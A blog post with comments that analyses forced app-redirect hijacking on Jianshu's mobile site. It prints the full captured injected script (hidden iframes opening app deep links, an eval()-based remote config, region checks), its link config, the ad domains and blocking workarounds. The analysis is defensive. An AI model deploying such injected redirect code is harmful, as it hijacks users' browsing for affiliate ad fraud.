简书移动端Web劫持、跳转app问题

每次手机上搜资料时,只要进入了简书,那么必定会跳转到各种app(淘宝、京东、天猫、京东金融等等),很烦的啊。
2020-02-02 更新:
在csdn、豆瓣上也发现这个问题。
 
我还以为是我本地宽带或者dns劫持,但是我本地dns用的是114和119,很少出现这种问题,而且简书也是https,浏览器也是绿标,
所以就usb chrome 远程调试看了下,不看不知道,居然会唤醒这么多app和跳转网页。

临时解决方案

屏蔽 ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),改 hosts 文件也行(注意 hosts 不支持通配符,子域名需要逐条添加)。
方法一: 手机端使用 火狐浏览器,安装 AdGuard 广告过滤插件,屏蔽 ad.lflucky.com  
方法二: 有位读者推荐的软件也很不错:AdGuard Home,安装在软路由中使用~
2020-03-09:
广告代码改为https://jian.t58b.com/js/jan/jian.js
所以,继续屏蔽 jian.t58b.com
 
最后想了下,既然是cdn劫持,那么我把cdn域名一刀切怎么样,别说,效果还蛮不错的,界面干净了。
屏蔽整个cdn下的js,不过这样带来的后果是文章不能动态加载出来,只适合偶尔使用简书。

cdn2.jianshu.io/*.js

 
 
手机端用yandex浏览器,装广告屏蔽插件,屏蔽  ad.lflucky.com 这个域名(建议屏蔽这个域名下的所有二级域名),我个人装的是广告终结者,本来想装uBlock的,懒得折腾就没装。
或者路由器ad插件屏蔽这个域名。
添加屏蔽域名后完美,终于不再跳转。

分析

因为我的前端是废的,所以也只能进行简单点的分析,大佬们看看就好了。
简单分析了一下跳转js,点击 VM2486:1 进入到js,格式化后的代码如下

// Captured ad/app-wakeup script, shown pretty-printed exactly as observed.
// Flow visible in this listing:
//   1. getJson() fetches "./json/product.json" (relative URL, so it resolves
//      against the document this script runs in).
//   2. ProductLink.init() skips platforms whose navigator.platform contains
//      "Win" or "Mac", then runs a region check backed by a script loaded from
//      https://pv.sohu.com/cityjson.
//   3. If the region is not on the exclusion list, deep links from the JSON are
//      loaded into hidden iframes, one "main" link first and then the
//      "secondary" ones on a timer.
// Network/DOM artefacts a defender can key on, all taken from the code below:
// the request to pv.sohu.com/cityjson, the relative requests for
// ./json/product.json and ./counturl.html?url=..., and iframes created with
// style.display = "none".
(function() {
	// Fetch URL `a` with XMLHttpRequest and pass the evaluated response to
	// callback `b` (if one was given).
	function getJson(a, b) {
		var c = new XMLHttpRequest();
		c.open("get", a);
		c.send(null);
		// The handler is attached after send(); it is only acted on once
		// readyState reaches 4 with HTTP status 200.
		c.onreadystatechange = function() {
			if (c.readyState == 4 && c.status == 200) {
				// NOTE(review): the response body is run through eval(), not
				// JSON.parse(). Whatever the server returns is executed as
				// JavaScript in this document, so the "config" endpoint is
				// effectively a remote code channel.
				b && b(eval("(" + c.responseText + ")"))
			}
		}
	}
	// Holds the fetched configuration: `productJson` (link lists), the list of
	// region names for which nothing is shown, and `avokeTime` (used below as
	// the interval, in seconds, between secondary links).
	function ProductLink(a) {
		this.product = a.productJson;
		this.disabledArea = ["UNITED STATES", "JAPAN", "SINGAPORE", "CANADA", "香港", "北京", "上海"];
		this.avokeTime = a.avokeTime
	}
	// Entry point: does nothing on platforms reporting "Win" or "Mac";
	// otherwise waits for the region lookup and then starts showing links
	// unless the visitor's region matches an entry in disabledArea.
	ProductLink.prototype.init = function() {
		var b = this;
		if (window.navigator.platform.indexOf("Win") > -1 || window.navigator.platform.indexOf("Mac") > -1) {} else {
			this.isDisabled(function() {
				// `a` stays true unless a disabled region name is found.
				var a = true;
				try {
					for (var i = 0; i < b.disabledArea.length; i++) {
						// returnCitySN is not defined in this listing; presumably it is
						// the global set by the pv.sohu.com/cityjson script loaded in
						// isDisabled() - confirm against that response.
						if (returnCitySN["cname"].indexOf(b.disabledArea[i]) > -1) {
							a = false;
							break
						}
					}
				// Errors are swallowed, so if the lookup failed (e.g. returnCitySN
				// is undefined) `a` remains true and the links are still shown.
				} catch(e) {}
				if (!a) {
					return
				}
				b.addElement()
			})
		}
	};
	// Despite the name, this only loads the region-lookup script and then calls
	// `a` exactly once: on the script's load event or after 4000 ms, whichever
	// comes first. The flag `c` prevents a second call.
	ProductLink.prototype.isDisabled = function(a) {
		var b = document.createElement("script");
		var c = false;
		document.body.appendChild(b);
		b.src = "https://pv.sohu.com/cityjson";
		b.onload = function() {
			if (!c) {
				c = true;
				a && a()
			}
		};
		// No onerror handler is set; the timeout is the only fallback path.
		setTimeout(function() {
			if (!c) {
				c = true;
				a && a()
			}
		},
		4000)
	};
	// Waits 2000 ms, then triggers the main link and starts the secondary ones.
	ProductLink.prototype.addElement = function() {
		var a = this;
		setTimeout(function() {
			a.showMainProject();
			a.showSecondaryProduct()
		},
		2000)
	};
	// Shows one link chosen from product.mainProduct.appLink.
	ProductLink.prototype.showMainProject = function() {
		this.showAllKind(this.product.mainProduct.appLink, this.product.mainProduct.cancelTime)
	};
	// Works through a copy of product.secondaryProduct in random order: every
	// avokeTime * 1000 ms one remaining entry is picked, shown and removed,
	// until the copy is empty and the interval is cleared.
	ProductLink.prototype.showSecondaryProduct = function() {
		var b = this;
		// concat() with no arguments makes a shallow copy, so the splice below
		// does not modify the original configuration array.
		var c = this.product.secondaryProduct.concat();
		var d = c.length;
		var e = null;
		e = setInterval(function() {
			if (d <= 0) {
				clearInterval(e);
				return
			}
			var a = Math.floor(Math.random() * d);
			b.showAllKind(c[a].appLink, c[a].cancelTime);
			c.splice(a, 1);
			d--
		},
		b.avokeTime * 1000)
	};
	// Picks one usable link from the appLink array `a` and opens it via
	// newIframe(); `b` is the lifetime (seconds) passed through to newIframe.
	// "random" entries carry a fixed `link`; "date" entries are keyed by
	// YYYY-MM-DD and are only usable if they have a key for today's date.
	ProductLink.prototype.showAllKind = function(a, b) {
		var c = a.concat();
		var d = c.length;
		var e = false;
		var f = this.getCurrentDate();
		// Loop until one link was opened (e) or no candidates remain (d == 0).
		// NOTE(review): an entry whose type is neither "random" nor "date" changes
		// neither `e` nor `d`, so a list made up only of such entries would keep
		// this loop spinning.
		while (d > 0 && !e) {
			var g = Math.floor(Math.random() * d);
			if (c[g].type == "random") {
				this.newIframe(c[g].link, b);
				e = true
			} else if (c[g].type == "date") {
				if (c[g][f]) {
					this.newIframe(c[g][f], b);
					e = true
				} else {
					// No link for today's date: drop this entry and try another.
					c.splice(g, 1);
					d--
				}
			}
		}
	};
	// Returns today's date in the browser's local time as "YYYY-MM-DD" with
	// zero-padded month and day; used as the lookup key for "date" entries.
	ProductLink.prototype.getCurrentDate = function() {
		var a = new Date(),
		Y = a.getFullYear() + "-",
		M = (a.getMonth() + 1 < 10 ? "0" + (a.getMonth() + 1) : a.getMonth() + 1) + "-",
		D = a.getDate() < 10 ? "0" + a.getDate() : a.getDate();
		return Y + M + D
	};
	// Opens link `b` without any visible UI: a hidden iframe is pointed at the
	// link, and a second hidden iframe loads ./counturl.html with the link as a
	// query parameter (presumably a hit counter - the page itself is not shown
	// here). Both iframes are removed again after `c` seconds.
	ProductLink.prototype.newIframe = function(b, c) {
		var d = document.createElement("iframe");
		d.style.display = "none";
		d.src = b;
		document.body.appendChild(d);
		var e = document.createElement("iframe");
		e.style.display = "none";
		e.src = "./counturl.html?url=" + encodeURIComponent(b);
		document.body.appendChild(e);
		// The closure captures both iframes so the delayed cleanup removes
		// exactly the pair created by this call.
		setTimeout((function(m, a) {
			return function() {
				document.body.removeChild(m);
				document.body.removeChild(a)
			}
		})(d, e), c * 1000)
	};
	// Bootstrap: fetch the link configuration and start the flow.
	getJson("./json/product.json",
	function(a) {
		new ProductLink(a).init()
	})
})();

嗯,上面有个getJson方法,搜索了下加载记录发现域名是:

https://ad.lflucky.com/janes/json/product.json(对应ip为:59.110.185.253)

阿里云的机器,很不错,考虑到各种不同的宽带用户,给予最佳的劫持体验
Json内容如下(时间 2019-08-31 15:52 ):

{
    "productJson": {
        "mainProduct": {
            "appName": "tb",
            "appLink": [
                {
                    "type": "random",
                    "link": "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768&materialid=10016&h5Url=https://h5.m.taobao.com/bcec/dahanghai-jump.html?spm=2014.ugdhh.4076930961.10016-1208-32768&bc_fl_src=growth_dhh_4076930961_10016-1208-32768"
                }
            ],
            "cancelTime": 5
        },
        "secondaryProduct": [
            {
                "appName": "uc",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=17707084109410804287&type=multiple&from=6001",
                        "2019-08-31": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-01": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-02": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=954127903094346666&type=multiple&from=6001",
                        "2019-09-03": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
                        "2019-09-04": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=5414198177651951323&type=multiple&from=6001",
                        "2019-09-05": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001",
                        "2019-09-06": "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=jixinhx&src_ch=jixinhx64&src_scene=pullup&url=ext:info_flow_open_channel:ch_id=100&insert_item_ids=1692900910150652661&type=multiple&from=6001"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "sjbd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "baiduboxapp://v1/easybrowse/open?url=https://dwz.cn/1VJnrokX?u=68a5251f61c446dd&needlog=1&logargs={"source":"1023217w","from":"openbox","page":"other","type":"","value":"url","channel":""}"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "yk",
                "appLink": [
                    {
                        "type": "random",
                        "link": "youku://weex?source=00002184&url=https://t.youku.com/yep/page/m/sanfang1903_wmdt?wh_weex=true&isNeedBaseImage=1&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000&refer=sanfang1903_operation.qrwang_00002184_000000_2qiMB3_19053000"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "wph",
                "appLink": [
                    {
                        "type": "random",
                        "link": "vipshop://goHome?tra_from=tra:C01V4m1bc22uzug2::mig_code::ac010m4olsydie4ern10dr6k8vkne6bd"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jdjr",
                "appLink": [
                    {
                        "type": "random",
                        "link": "jdmobile://share?jumpType=8&jumpUrl=https://u.jd.com/Yxw5iX?channellv=hqtf1&channel=default&sourceUrl=1108*gt001"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "pdd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "pinduoduo://com.xunmeng.pinduoduo/duo_coupon_landing.html?goods_id=2338511&pid=8827514_107105089&cpsSign=CC_190820_8827514_107105089_49f497cee8712faf331724b17240bda9&duoduo_type=2"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "zfb",
                "appLink": [
                    {
                        "type": "random",
                        "link": "alipays://platformapi/startapp?appClearTop=false&appId=20000067&startMultApp=YES&url=https://render.alipay.com/p/f/fd-jr8wq5v4/pages/inside/index.html?pid=2088231933430185&partnerid=fl01&__webview_options__=pd%3DNO%26ttb%3Dauto&enableWK=YES"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jd",
                "appLink": [
                    {
                        "type": "random",
                        "link": "openapp.jdmobile://virtual?params={\"category\":\"jump\",\"sourceType\":\"sourceType_test\",\"des\":\"m\",\"url\":\"https://u.jd.com/dRrNLl\",\"unionSource\":\"Awake\",\"channel\":\"cedad4c0ad02455c9a818f1b3d98da1a\",\"union_open\":\"union_cps\"}"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "jrtt",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "snssdk143://search?keyword=信息学奥赛取消+有学生集训数月&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-08-31": "snssdk143://search?keyword=在家乡一口气买十套房?柳岩回应&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-01": "snssdk143://search?keyword=国内首例克隆猫主人:花了25万&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-02": "snssdk143://search?keyword=迪士尼不接受调解+坚持翻包检查&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-03": "snssdk143://search?keyword=宠物医疗市场扩张+执业医师稀缺&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-04": "snssdk143://search?keyword=游客坐路中央拍照交警提醒&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-05": "snssdk143://search?keyword=天降垃圾砸车可起诉全楼&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26",
                        "2019-09-06": "snssdk143://search?keyword=健身房承诺开泳池未兑现被投诉&from=gs_ac_click_schema_lx26&growth_from=click_schema_lx26&pd=synthesis&source=click_schema_lx26&needlaunchlog=1&gd_label=click_schema_lx26"
                    }
                ],
                "cancelTime": 5
            },
            {
                "appName": "douyin",
                "appLink": [
                    {
                        "type": "date",
                        "2019-08-30": "snssdk1128://detail?id=6727796549604150532&gd_label=click_schema_lx5",
                        "2019-08-31": "snssdk1128://detail?id=6727793959982157063&gd_label=click_schema_lx5",
                        "2019-09-01": "snssdk1128://detail?id=6728772476395949320&gd_label=click_schema_lx5",
                        "2019-09-02": "snssdk1128://detail?id=6728647813158145291&gd_label=click_schema_lx5",
                        "2019-09-03": "snssdk1128://detail?id=6729018672242871556&gd_label=click_schema_lx5",
                        "2019-09-04": "snssdk1128://detail?id=6729044398245498124&gd_label=click_schema_lx5",
                        "2019-09-05": "snssdk1128://detail?id=6728696625901980931&gd_label=click_schema_lx5"
                    }
                ],
                "cancelTime": 5
            }
        ]
    },
    "avokeTime": 2
}

在 productJson.secondaryProduct 看出,总共会跳转以下几个app

  1. UC
  2. sjbd(不知道是啥)
  3. yk(优酷)
  4. wph(不知道是啥)
  5. jdjr(京东金融)
  6. pdd(拼多多)
  7. zfb(支付宝)
  8. jd(京东)
  9. jrtt(不知道是啥)
  10. douyin(抖音)

可以看出来是真的恶心,最恶心的是跳转到这些页面

https://mip.yemnn.cn/llq_5/p7069z.html
https://m.685862.vip/2019llq_5/p7069z.html?20190901001245&t=1786766884&f=1&i=1

导致不能后退、强制下载app,而且又得看历史记录才能到原来浏览的地方。这个部分没有重现出来,后面补上。



 
然后继续往上走,发现这个域名第一次出现的地方是

https://cdn2.jianshu.io/asimov/2.0a635c573bb72b959d07.js,简书的cdn

同时访问搜狐的接口进行ip地域解析,根据用户所在地区进行不同的广告或者跳转app。
剩下的不用分析也知道了,只有几种可能

  1. 简书 官方自己搞得跳转代码
  2. 简书用的cdn服务商进行的劫持
  3. 运营商结合cdn服务商一起劫持

此时我这里 cdn2.jianshu.io 解析的ip为:163.177.20.232
而在ipip和17ce发现,解析到这个ip的地区是广州联通、加上我的地区,会发生劫持。
 





 
 

Yandex浏览器添加ad插件进行屏蔽


跳转到页面,待复现分析......

更新

由于我开启了ipv6,默认解析dns变成了运营商的ipv6,导致返回的ip和公共dns不一样,运营商+cdn运营商劫持?
openwrt居然不能指定ipv6的dns,dncp给客户端的v6居然是运营商的
而电脑手机会按照v6的dns进行解析,不按照设置的v4 dns解析。


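根据ipip显示信息来看,是一家 天际友盟  广告联盟,而我好奇的是,这家公司是怎么拿到简书的ssl证书的?
手机浏览器还显示绿标
(补充一点:绿标只说明浏览器与所连节点之间的 TLS 证书校验通过。CDN 节点要替源站提供 https,通常本身就部署了该域名的证书,所以绿标并不能排除 js 在 CDN 节点或源站一侧被改动/插入的可能。)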
 

 

更新

在禁用ipv6后,我本地使用114和119解析还是被劫持的ip


 

评论

  1. looqir
    1年前
    2020-4-28 15:50:29

    请问不让返回的代码是什么呀

  2. AAC
    1年前
    2020-4-02 9:11:15

    sjbd=手机百度

  3. 1年前
    2020-3-11 0:05:50

    我因为这个都不在手机点开简书;1,噗 :mrgreen:

  4. ywq
    1年前
    2020-3-05 15:12:30

    wph=唯品会
    jrtt=今日头条

    • admin 博主
      1年前
      2020-3-05 21:30:22

      make~

  5. xixihaha
    2年前
    2020-2-02 19:53:09

    我也分析出来了 ad.lflucky.com 网址,除了简书 还有 豆瓣 ...都有劫持跳转app要慢慢分析了

    • admin 博主
      2年前
      2020-2-02 20:12:57

      csdn也是,貌似cdn投毒......

      • xixihaha
        1年前
        2020-2-12 14:16:58

        我用AdGuard Home放在路由器上,从此世界清净

        • admin 博主
          1年前
          2020-2-12 15:56:16

          我也试了一下,还是挺不错的~谢谢推荐 😀

    • 黑夜里的黑猫
      1年前
      2020-6-05 21:47:59

      手机知乎也是这样。

  6. jean
    2年前
    2020-1-29 20:16:21

    互联网毒瘤, 下个手机换苹果, 安卓没人权

    • admin 博主
      2年前
      2020-1-29 20:28:37

      这个没办法,国内环境不好,各种卖流量,其实用qq浏览器之类的也可以避免这种情况,但是用了国产浏览器后……你懂的……
